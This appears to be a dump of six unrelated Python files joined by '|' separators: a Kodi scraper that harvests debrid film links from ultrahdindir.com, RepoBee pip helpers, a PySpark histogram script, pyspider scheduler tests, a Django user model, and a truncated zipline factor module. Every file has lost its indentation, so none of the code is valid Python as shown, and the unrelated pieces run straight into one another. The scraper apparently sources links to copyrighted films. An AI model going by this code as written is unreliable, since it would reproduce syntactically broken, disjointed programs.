along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import debrid
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser2
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['ultrahdindir.com']
self.base_link = 'http://ultrahdindir.com'
self.post_link = '/index.php?do=search'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = {'imdb': imdb, 'title': title, 'year': year}
url = urllib.urlencode(url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
if url == None: return sources
if debrid.status() is False: raise Exception()
data = urlparse.parse_qs(url)
data = dict([(i, data[i][0]) if data[i] else (i, '') for i in data])
title = data['title'].replace(':','').lower()
year = data['year']
query = '%s %s' % (data['title'], data['year'])
query = re.sub('(\\\|/| -|:|;|\*|\?|"|\'|<|>|\|)', ' ', query)
url = urlparse.urljoin(self.base_link, self.post_link)
post = 'do=search&subaction=search&search_start=0&full_search=0&result_from=1&story=%s' % urllib.quote_plus(query)
r = client.request(url, post=post)
r = client.parseDOM(r, 'div', attrs={'class': 'box-out margin'})
r = [(dom_parser2.parse_dom(i, 'div', attrs={'class':'news-title'})) for i in r if data['imdb'] in i]
r = [(dom_parser2.parse_dom(i[0], 'a', req='href')) for i in r if i]
r = [(i[0].attrs['href'], i[0].content) for i in r if i]
hostDict = hostprDict + hostDict
for item in r:
try:
name = item[1]
y = re.findall('\((\d{4})\)', name)[0]
if not y == year: raise Exception()
s = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', name)
s = s[0] if s else '0'
data = client.request(item[0])
data = dom_parser2.parse_dom(data, 'div', attrs={'id': 'r-content'})
data = re.findall('\s*<b><a href=.+?>(.+?)</b>.+?<u><b><a href="(.+?)".+?</a></b></u>',
data[0].content, re.DOTALL)
u = [(i[0], i[1], s) for i in data if i]
for name, url, size in u:
try:
if '4K' in name:
quality = '4K'
elif '1080p' in name:
quality = '1080p'
elif '720p' in name:
quality = '720p'
elif any(i in ['dvdscr', 'r5', 'r6'] for i in name):
quality = 'SCR'
elif any(i in ['camrip', 'tsrip', 'hdcam', 'hdts', 'dvdcam', 'dvdts', 'cam', 'telesync', 'ts']
for i in name):
quality = 'CAM'
else: quality = '720p'
info = []
if '3D' in name or '.3D.' in url: info.append('3D'); quality = '1080p'
if any(i in ['hevc', 'h265', 'x265'] for i in name): info.append('HEVC')
try:
size = re.findall('((?:\d+\.\d+|\d+\,\d+|\d+)\s*(?:GB|GiB|Gb|MB|MiB|Mb))', size)[-1]
div = 1 if size.endswith(('Gb', 'GiB', 'GB')) else 1024
size = float(re.sub('[^0-9|/.|/,]', '', size)) / div
size = '%.2f GB' % size
info.append(size)
except:
pass
info = ' | '.join(info)
url = client.replaceHTMLCodes(url)
url = url.encode('utf-8')
if any(x in url for x in ['.rar', '.zip', '.iso', 'turk']):continue
if 'ftp' in url: host = 'COV'; direct = True;
else: direct = False; host= 'turbobit.net'
#if not host in hostDict: continue
host = client.replaceHTMLCodes(host)
host = host.encode('utf-8')
sources.append({'source': host, 'quality': quality, 'language': 'en',
'url': url, 'info': info, 'direct': direct, 'debridonly': True})
except:
pass
except:
pass
return sources
except:
return sources
def resolve(self, url):
return url
|
"""Helper functions for the distribution."""
import importlib
import json
import pathlib
import subprocess
import sys
import types
import os
from typing import Optional, List
import requests
import repobee_plug as plug
import _repobee.ext
from _repobee import distinfo
from _repobee import plugin
class DependencyResolutionError(plug.PlugError):
"""Raise when dependency resolution fails during an install."""
def get_installed_plugins_path() -> pathlib.Path:
"""Return the path to the installed_plugins.json file."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "installed_plugins.json"
def get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> dict:
"""Return the public content of the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
if "_metainfo" in installed_plugins:
del installed_plugins["_metainfo"]
return installed_plugins
def _get_installed_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
):
"""Return the content of the installed_plugins.json file, with metainfo."""
return json.loads(
(installed_plugins_path or get_installed_plugins_path()).read_text(
"utf8"
)
)
def write_installed_plugins(
installed_plugins: dict,
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the installed_plugins.json file."""
path = installed_plugins_path or get_installed_plugins_path()
metainfo = _get_installed_plugins(path).get("_metainfo") or {}
metainfo.update(installed_plugins.get("_metainfo") or {})
installed_plugins_write = dict(installed_plugins)
installed_plugins_write["_metainfo"] = metainfo
path.write_text(
json.dumps(installed_plugins_write, indent=4), encoding="utf8"
)
def get_active_plugins(
installed_plugins_path: Optional[pathlib.Path] = None,
) -> List[str]:
"""Read active plugins from the installed_plugins.json file."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
return (installed_plugins.get("_metainfo") or {}).get(
"active_plugins"
) or []
def write_active_plugins(
active_plugins: List[str],
installed_plugins_path: Optional[pathlib.Path] = None,
) -> None:
"""Write the active plugins."""
installed_plugins = _get_installed_plugins(installed_plugins_path)
installed_plugins.setdefault("_metainfo", {})[
"active_plugins"
] = active_plugins
write_installed_plugins(installed_plugins, installed_plugins_path)
def get_pip_path() -> pathlib.Path:
"""Return the path to the installed pip binary."""
assert distinfo.INSTALL_DIR
return distinfo.INSTALL_DIR / "env" / "bin" / "pip"
def get_plugins_json(url: str = "https://repobee.org/plugins.json") -> dict:
"""Fetch and parse the plugins.json file.
Args:
url: URL to the plugins.json file.
Returns:
A dictionary with the contents of the plugins.json file.
"""
resp = requests.get(url)
if resp.status_code != 200:
plug.log.error(resp.content.decode("utf8"))
raise plug.PlugError(f"could not fetch plugins.json from '{url}'")
return resp.json()
def get_builtin_plugins(ext_pkg: types.ModuleType = _repobee.ext) -> dict:
"""Returns a dictionary of builting plugins on the same form as the
plugins.json dict.
"""
def _get_plugin_description(name):
return (
importlib.import_module(f"{ext_pkg.__name__}.{name}").__dict__.get(
"PLUGIN_DESCRIPTION"
)
or "-"
)
return {
name: dict(
description=_get_plugin_description(name),
url=f"https://repobee.readthedocs.io/"
f"en/stable/builtins.html#{name}",
versions={"N/A": {}},
builtin=True,
)
for name in plugin.get_module_names(ext_pkg)
}
def pip(command: str, *args, **kwargs) -> subprocess.CompletedProcess:
"""Thin wrapper around the ``pip`` executable in the distribution's virtual
environment.
Args:
command: The command to execute (e.g. "install" or "list").
args: Positional arguments to ``pip``, passed in order. Flags should
also be passed here (e.g. `--pre`)
kwargs: Keyword arguments to ``pip``, passed as ``--key value`` to the
CLI. If the value is ``True``, the argument is passed as a flag,
i.e. as ``--key``.
Returns:
True iff the command exited with a zero exit status.
Raises:
DependencyResolutionError: If the 2020-resolver encounters fails to
resolve dependencies.
"""
cli_kwargs = [
f"--{key.replace('_', '-')}"
# True is interpreted as a flag
+ (f"={val}" if val is not True else "")
for key, val in kwargs.items()
]
env = dict(os.environ)
if command == "install":
# the resolver allows us to avoid installing plugins that are
# incompatible with the current version of RepoBee
cli_kwargs.append("--use-feature=2020-resolver")
# REPOBEE_INSTALL_DIR must be available when upgrading RepoBee,
# or the dist plugins aren't activated
env["REPOBEE_INSTALL_DIR"] = str(distinfo.INSTALL_DIR)
# due to the hack in setup.py to edit the distinfo, we must build
# RepoBee from source
cli_kwargs.append("--no-binary=repobee")
cmd = [str(get_pip_path()), command, *args, *cli_kwargs]
proc = subprocess.run(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env
)
if proc.returncode != 0:
stderr = proc.stderr.decode(sys.getdefaultencoding())
plug.log.error(stderr)
if "ResolutionImpossible" in stderr:
raise DependencyResolutionError()
return proc
|
from pyspark import SparkConf, SparkContext
import collections
conf = SparkConf().setMaster("local").setAppName("RatingsHistogram")
sc = SparkContext(conf = conf)
lines = sc.textFile("D:/celebal/resources/ml-100k/u.data")
ratings = lines.map(lambda x: x.split()[2])
result = ratings.countByValue()
sortedResults = collections.OrderedDict(sorted(result.items()))
for key, value in sortedResults.items():
print("%s %i" % (key, value))
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-02-08 22:37:13
import os
import time
import shutil
import unittest2 as unittest
import logging
import logging.config
logging.config.fileConfig("pyspider/logging.conf")
from pyspider.scheduler.task_queue import TaskQueue
class TestTaskQueue(unittest.TestCase):
@classmethod
def setUpClass(self):
self.task_queue = TaskQueue()
self.task_queue.rate = 100000
self.task_queue.burst = 100000
self.task_queue.processing_timeout = 0.5
def test_10_put(self):
self.task_queue.put('a3', 0, time.time() + 0.5)
self.task_queue.put('a4', 3, time.time() + 0.2)
self.task_queue.put('a2', 0)
self.task_queue.put('a1', 1)
self.assertEqual(self.task_queue.size(), 4)
def test_20_update(self):
self.task_queue.put('a2', 4)
self.assertEqual(self.task_queue.size(), 4)
self.task_queue.put('a3', 2, 0)
self.assertEqual(self.task_queue.size(), 4)
def test_30_get_from_priority_queue(self):
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(self.task_queue.size(), 4)
def test_40_time_queue_1(self):
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.size(), 4)
def test_50_time_queue_2(self):
time.sleep(0.3)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(self.task_queue.size(), 4)
def test_60_processing_queue(self):
time.sleep(0.5)
self.task_queue.check_update()
self.assertEqual(self.task_queue.get(), 'a2')
self.assertEqual(len(self.task_queue), 4)
self.assertEqual(self.task_queue.get(), 'a4')
self.assertEqual(self.task_queue.get(), 'a3')
self.assertEqual(self.task_queue.get(), 'a1')
self.assertEqual(len(self.task_queue), 4)
def test_70_done(self):
self.assertTrue(self.task_queue.done('a2'))
self.assertTrue(self.task_queue.done('a1'))
self.assertEqual(len(self.task_queue), 2)
self.assertTrue(self.task_queue.done('a4'))
self.assertTrue(self.task_queue.done('a3'))
self.assertEqual(len(self.task_queue), 0)
from pyspider.scheduler.token_bucket import Bucket
class TestBucket(unittest.TestCase):
def test_bucket(self):
bucket = Bucket(100, 1000)
self.assertEqual(bucket.get(), 1000)
time.sleep(0.1)
self.assertEqual(bucket.get(), 1000)
bucket.desc(100)
self.assertEqual(bucket.get(), 900)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 910, delta=2)
time.sleep(0.1)
self.assertAlmostEqual(bucket.get(), 920, delta=2)
try:
from six.moves import xmlrpc_client
except ImportError:
import xmlrpclib as xmlrpc_client
from pyspider.scheduler.scheduler import Scheduler
from pyspider.database.sqlite import taskdb, projectdb, resultdb
from pyspider.libs.multiprocessing_queue import Queue
from pyspider.libs.utils import run_in_thread
class TestScheduler(unittest.TestCase):
taskdb_path = './data/tests/task.db'
projectdb_path = './data/tests/project.db'
resultdb_path = './data/tests/result.db'
check_project_time = 1
scheduler_xmlrpc_port = 23333
@classmethod
def setUpClass(self):
shutil.rmtree('./data/tests', ignore_errors=True)
os.makedirs('./data/tests')
def get_taskdb():
return taskdb.TaskDB(self.taskdb_path)
self.taskdb = get_taskdb()
def get_projectdb():
return projectdb.ProjectDB(self.projectdb_path)
self.projectdb = get_projectdb()
def get_resultdb():
return resultdb.ResultDB(self.resultdb_path)
self.resultdb = get_resultdb()
self.newtask_queue = Queue(10)
self.status_queue = Queue(10)
self.scheduler2fetcher = Queue(10)
self.rpc = xmlrpc_client.ServerProxy('http://localhost:%d' % self.scheduler_xmlrpc_port)
def run_scheduler():
scheduler = Scheduler(taskdb=get_taskdb(), projectdb=get_projectdb(),
newtask_queue=self.newtask_queue, status_queue=self.status_queue,
out_queue=self.scheduler2fetcher, data_path="./data/tests/",
resultdb=get_resultdb())
scheduler.UPDATE_PROJECT_INTERVAL = 0.1
scheduler.LOOP_INTERVAL = 0.1
scheduler.INQUEUE_LIMIT = 10
scheduler.DELETE_TIME = 0
scheduler.DEFAULT_RETRY_DELAY = {'': 5}
scheduler._last_tick = int(time.time()) # not dispatch cronjob
run_in_thread(scheduler.xmlrpc_run, port=self.scheduler_xmlrpc_port)
scheduler.run()
self.process = run_in_thread(run_scheduler)
time.sleep(1)
@classmethod
def tearDownClass(self):
if self.process.is_alive():
self.rpc._quit()
self.process.join(5)
assert not self.process.is_alive()
shutil.rmtree('./data/tests', ignore_errors=True)
time.sleep(1)
def test_10_new_task_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
self.assertEqual(self.rpc.size(), 0)
self.assertEqual(len(self.rpc.get_active_tasks()), 0)
def test_20_new_project(self):
self.projectdb.insert('test_project', {
'name': 'test_project',
'group': 'group',
'status': 'TODO',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
def test_30_update_project(self):
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=1)
self.projectdb.update('test_project', status="DEBUG")
time.sleep(0.1)
self.rpc.update_project()
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.assertEqual(task['url'], 'data:,_on_get_info')
def test_34_new_not_used_project(self):
self.projectdb.insert('test_project_not_started', {
'name': 'test_project_not_started',
'group': 'group',
'status': 'RUNNING',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 1.0,
'burst': 10,
})
task = self.scheduler2fetcher.get(timeout=1)
self.assertEqual(task['taskid'], '_on_get_info')
def test_35_new_task(self):
time.sleep(0.2)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
},
})
time.sleep(0.5)
task = self.scheduler2fetcher.get(timeout=10)
self.assertGreater(len(self.rpc.get_active_tasks()), 0)
self.assertIsNotNone(task)
self.assertEqual(task['project'], 'test_project')
self.assertIn('schedule', task)
self.assertIn('fetch', task)
self.assertIn('process', task)
self.assertIn('track', task)
self.assertEqual(task['fetch']['data'], 'abc')
def test_37_force_update_processing_task(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url_force_update',
'schedule': {
'age': 10,
'force_update': True,
},
})
time.sleep(0.2)
# it should not block next
def test_40_taskdone_error_no_project(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'no_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_50_taskdone_error_no_track(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url'
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {}
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 1)
def test_60_taskdone_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
task = self.scheduler2fetcher.get(timeout=4)
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
def test_70_taskdone_ok(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
time.sleep(0.2)
self.assertEqual(self.rpc.size(), 0)
def test_80_newtask_age_ignore(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_82_newtask_via_rpc(self):
self.rpc.newtask({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 30,
},
})
time.sleep(0.1)
self.assertEqual(self.rpc.size(), 0)
def test_90_newtask_with_itag(self):
time.sleep(0.1)
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'itag': "abc",
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.test_70_taskdone_ok()
def test_a10_newtask_restart_by_age(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a20_failed_retry(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=5)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'track': {
'fetch': {
'ok': False
},
'process': {
'ok': False
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_a30_task_verify(self):
self.assertFalse(self.rpc.newtask({
#'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
#'project': 'test_project',
'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
#'url': 'url',
}))
self.assertFalse(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'not_exist_project',
'url': 'url',
}))
self.assertTrue(self.rpc.newtask({
'taskid': 'taskid#',
'project': 'test_project',
'url': 'url',
}))
def test_a40_success_recrawl(self):
self.newtask_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'fetch': {
'data': 'abc',
},
'process': {
'data': 'abc',
},
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a50_failed_recrawl(self):
for i in range(3):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
'auto_recrawl': True,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': False
},
}
})
task = self.scheduler2fetcher.get(timeout=10)
self.assertIsNotNone(task)
def test_a60_disable_recrawl(self):
self.status_queue.put({
'taskid': 'taskid',
'project': 'test_project',
'url': 'url',
'schedule': {
'age': 0,
'retries': 1,
},
'track': {
'fetch': {
'ok': True
},
'process': {
'ok': True
},
}
})
from six.moves import queue as Queue
with self.assertRaises(Queue.Empty):
self.scheduler2fetcher.get(timeout=5)
def test_x10_inqueue_limit(self):
self.projectdb.insert('test_inqueue_project', {
'name': 'test_inqueue_project',
'group': 'group',
'status': 'DEBUG',
'script': 'import time\nprint(time.time())',
'comments': 'test project',
'rate': 0,
'burst': 0,
})
time.sleep(0.1)
pre_size = self.rpc.size()
for i in range(20):
self.newtask_queue.put({
'taskid': 'taskid%d' % i,
'project': 'test_inqueue_project',
'url': 'url',
'schedule': {
'age': 3000,
'force_update': True,
},
})
time.sleep(1)
self.assertEqual(self.rpc.size() - pre_size, 10)
def test_x20_delete_project(self):
self.assertIsNotNone(self.projectdb.get('test_inqueue_project'))
#self.assertIsNotNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
self.projectdb.update('test_inqueue_project', status="STOP", group="lock,delete")
time.sleep(1)
self.assertIsNone(self.projectdb.get('test_inqueue_project'))
self.taskdb._list_project()
self.assertIsNone(self.taskdb.get_task('test_inqueue_project', 'taskid1'))
def test_z10_startup(self):
self.assertTrue(self.process.is_alive())
def test_z20_quit(self):
self.rpc._quit()
time.sleep(0.2)
self.assertFalse(self.process.is_alive())
self.assertEqual(
self.taskdb.get_task('test_project', 'taskid')['status'],
self.taskdb.SUCCESS
)
if __name__ == '__main__':
unittest.main()
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.models import BaseUserManager
from django.conf import settings
class UserProfileManager(BaseUserManager):
"""Manager for user profiles"""
def create_user(self, email, name, password=None):
"""create a new user profile"""
if not email:
raise ValueError("User must have and email address")
email = self.normalize_email(email)
user = self.model(email=email,name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, name, password):
"""create and save new superuser with given details"""
user = self.create_user(email, name, password)
user.is_superuser = True
user.is_staff = True
user.save(using=self._db)
return user
class UserProfile(AbstractBaseUser,PermissionsMixin):
"""Database model for users in the system """
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserProfileManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def get_full_name(self):
"""Retrieve full name of user"""
return self.name
def get_short_name(self):
"""Retrieve short name of user"""
return self.name
def __str__(self):
"""Return string representation of our user"""
return self.email
class ProfileFeedItem(models.Model):
"""Profile status update"""
user_profile = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE
)
status_text = models.CharField(max_length=255)
created_on = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Retusnt the model as a string"""
return self.status_text
|
"""
factor.py
"""
from functools import wraps
from operator import attrgetter
from numbers import Number
from numpy import inf, where
from toolz import curry
from zipline.errors import UnknownRankMethod
from zipline.lib.normalize import naive_grouped_rowwise_apply
from zipline.lib.rank import masked_rankdata_2d
from zipline.pipeline.classifiers import Classifier, Everything, Quantiles
from zipline.pipeline.mixins import (
CustomTermMixin,
LatestMixin,
PositiveWindowLengthMixin,
RestrictedDTypeMixin,
SingleInputMixin,
)
from zipline.pipeline.term import (
ComputableTerm,
NotSpecified,
NotSpecifiedType,
Term,
)
from zipline.pipeline.expression import (
BadBinaryOperator,
COMPARISONS,
is_comparison,
MATH_BINOPS,
method_name_for_op,
NumericalExpression,
NUMEXPR_MATH_FUNCS,
UNARY_OPS,
unary_op_name,
)
from zipline.pipeline.filters import (
Filter,
NumExprFilter,
PercentileFilter,
NullFilter,
)
from zipline.utils.input_validation import expect_types
from zipline.utils.math_utils import nanmean, nanstd
from zipline.utils.numpy_utils import (
bool_dtype,
coerce_to_dtype,
datetime64ns_dtype,
float64_dtype,
int64_dtype,
)
from zipline.utils.preprocess import preprocess
_RANK_METHODS = frozenset(['average', 'min', 'max', 'dense', 'ordinal'])
def coerce_numbers_to_my_dtype(f):
"""
A decorator for methods whose signature is f(self, other) that coerces
``other`` to ``self.dtype``.
This is used to make comparison operations between numbers and `Factor`
instances work independently of whether the user supplies a float or
integer literal.
For example, if I write::
my_filter = my_factor > 3
my_factor probably has dtype float64, but 3 is an int, so we want to coerce
to float64 before doing the comparison.
"""
@wraps(f)
def method(self, other):
if isinstance(other, Number):
other = coerce_to_dtype(self.dtype, other)
return f(self, other)
return method
@curry
def set_attribute(name, value):
"""
Decorator factory for setting attributes on a function.
Doesn't change the behavior of the wrapped function.
Usage
-----
>>> @set_attribute('__name__', 'foo')
... def bar():
... return 3
...
>>> bar()
3
>>> bar.__name__
'foo'
"""
def decorator(f):
setattr(f, name, value)
return f
return decorator
# Decorators for setting the __name__ and __doc__ properties of a decorated
# function.
# Example:
with_name = set_attribute('__name__')
with_doc = set_attribute('__doc__')
def binop_return_type(op):
if is_comparison(op):
return NumExprFilter
else:
return NumExprFactor
def binop_return_dtype(op, left, right):
"""
Compute the expected return dtype for the given binary operator.
Parameters
----------
op : str
Operator symbol, (e.g. '+', '-', ...).
left : numpy.dtype
Dtype of left hand side.
right : numpy.dtype
Dtype of right hand side.
Returns
-------
outdtype : numpy.dtype
The dtype of the result of `left <op> right`.
"""
if is_comparison(op):
if left != right:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Comparisons are only supported between Factors of equal "
"dtypes.".format(left=left, op=op, right=right)
)
return bool_dtype
elif left != float64_dtype or right != float64_dtype:
raise TypeError(
"Don't know how to compute {left} {op} {right}.\n"
"Arithmetic operators are only supported between Factors of "
"dtype 'float64'.".format(
left=left.name,
op=op,
right=right.name,
)
)
return float64_dtype
def binary_operator(op):
"""
Factory function for making binary operator methods on a Factor subclass.
Returns a function, "binary_operator" suitable for implementing functions
like __add__.
"""
# When combining a Factor with a NumericalExpression, we use this
# attrgetter instance to defer to the commuted implementation of the
# NumericalExpression operator.
commuted_method_getter = attrgetter(method_name_for_op(op, commute=True))
@with_doc("Binary Operator: '%s'" % op)
@with_name(method_name_for_op(op))
@coerce_numbers_to_my_dtype
def binary_operator(self, other):
# This can't be hoisted up a scope because the types returned by
# binop_return_type aren't defined when the top-level function is
# invoked in the class body of Factor.
return_type = binop_return_type(op)
if isinstance(self, NumExprFactor):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other,
)
return return_type(
"({left}) {op} ({right})".format(
left=self_expr,
op=op,
right=other_expr,
),
new_inputs,
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, NumExprFactor):
# NumericalExpression overrides ops to correctly handle merging of
# inputs. Look up and call the appropriate reflected operator with
# ourself as the input.
return commuted_method_getter(other)(self)
elif isinstance(other, Term):
if self is other:
return return_type(
"x_0 {op} x_0".format(op=op),
(self,),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
return return_type(
"x_0 {op} x_1".format(op=op),
(self, other),
dtype=binop_return_dtype(op, self.dtype, other.dtype),
)
elif isinstance(other, Number):
return return_type(
"x_0 {op} ({constant})".format(op=op, constant=other),
binds=(self,),
# .dtype access is safe here because coerce_numbers_to_my_dtype
# will convert any input numbers to numpy equivalents.
dtype=binop_return_dtype(op, self.dtype, other.dtype)
)
raise BadBinaryOperator(op, self, other)
return binary_operator
def reflected_binary_operator(op):
"""
Factory function for making binary operator methods on a Factor.
Returns a function, "reflected_binary_operator" suitable for implementing
functions like __radd__.
"""
assert not is_comparison(op)
@with_name(method_name_for_op(op, commute=True))
@coerce_numbers_to_my_dtype
def reflected_binary_operator(self, other):
if isinstance(self, NumericalExpression):
self_expr, other_expr, new_inputs = self.build_binary_op(
op, other
)
return NumExprFactor(
"({left}) {op} ({right})".format(
left=other_expr,
right=self_expr,
op=op,
),
new_inputs,
dtype=binop_return_dtype(op, other.dtype, self.dtype)
)
# Only have to handle the numeric case because in all other valid cases
# the corresponding left-binding method will be called.
elif isinstance(other, Number):
return NumExprFactor(
"{constant} {op} x_0".format(op=op, constant=other),
binds=(self,),
dtype=binop_return_dtype(op, other.dtype, self.dtype),
)
raise BadBinaryOperator(op, other, self)
return reflected_binary_operator
def unary_operator(op):
"""
Factory function for making unary operator methods for Factors.
"""
# Only negate is currently supported.
valid_ops = {'-'}
if op not in valid_ops:
raise ValueError("Invalid unary operator %s." % op)
@with_doc("Unary Operator: '%s'" % op)
@with_name(unary_op_name(op))
def unary_operator(self):
if self.dtype != float64_dtype:
raise TypeError(
"Can't apply unary operator {op!r} to instance of "
"{typename!r} with dtype {dtypename!r}.\n"
"{op!r} is only supported for Factors of dtype "
"'float64'.".format(
op=op,
typename=type(self).__name__,
dtypename=self.dtype.name,
)
)
# This can't be hoisted up a scope because the types returned by
# unary_op_return_type aren't defined when the top-level function is
# invoked.
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{op}({expr})".format(op=op, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{op}x_0".format(op=op),
(self,),
dtype=float64_dtype,
)
return unary_operator
def function_application(func):
"""
Factory function for producing function application methods for Factor
subclasses.
"""
if func not in NUMEXPR_MATH_FUNCS:
raise ValueError("Unsupported mathematical function '%s'" % func)
@with_name(func)
def mathfunc(self):
if isinstance(self, NumericalExpression):
return NumExprFactor(
"{func}({expr})".format(func=func, expr=self._expr),
self.inputs,
dtype=float64_dtype,
)
else:
return NumExprFactor(
"{func}(x_0)".format(func=func),
(self,),
dtype=float64_dtype,
)
return mathfunc
def restrict_to_dtype(dtype, message_template):
"""
A factory for decorators that restricting Factor methods to only be
callable on Factors with a specific dtype.
This is conceptually similar to
zipline.utils.input_validation.expect_dtypes, but provides more flexibility
for providing error messages that are specifically targeting Factor
methods.
Parameters
----------
dtype : numpy.dtype
The dtype on which the decorated method may be called.
message_template : str
A template for the error message to be raised.
`message_template.format` will be called with keyword arguments
`method_name`, `expected_dtype`, and `received_dtype`.
Usage
-----
@restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}."
"{method_name}() requires factors of dtype{expected_dtype}."
),
)
def some_factor_method(self, ...):
self.stuff_that_requires_being_float64(...)
"""
def processor(factor_method, _, factor_instance):
factor_dtype = factor_instance.dtype
if factor_dtype != dtype:
raise TypeError(
message_template.format(
method_name=factor_method.__name__,
expected_dtype=dtype.name,
received_dtype=factor_dtype,
)
)
return factor_instance
return preprocess(self=processor)
# Decorators for Factor methods.
if_not_float64_tell_caller_to_use_isnull = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
"{method_name}() was called on a factor of dtype {received_dtype}.\n"
"{method_name}() is only defined for dtype {expected_dtype}."
"To filter missing data, use isnull() or notnull()."
)
)
float64_only = restrict_to_dtype(
dtype=float64_dtype,
message_template=(
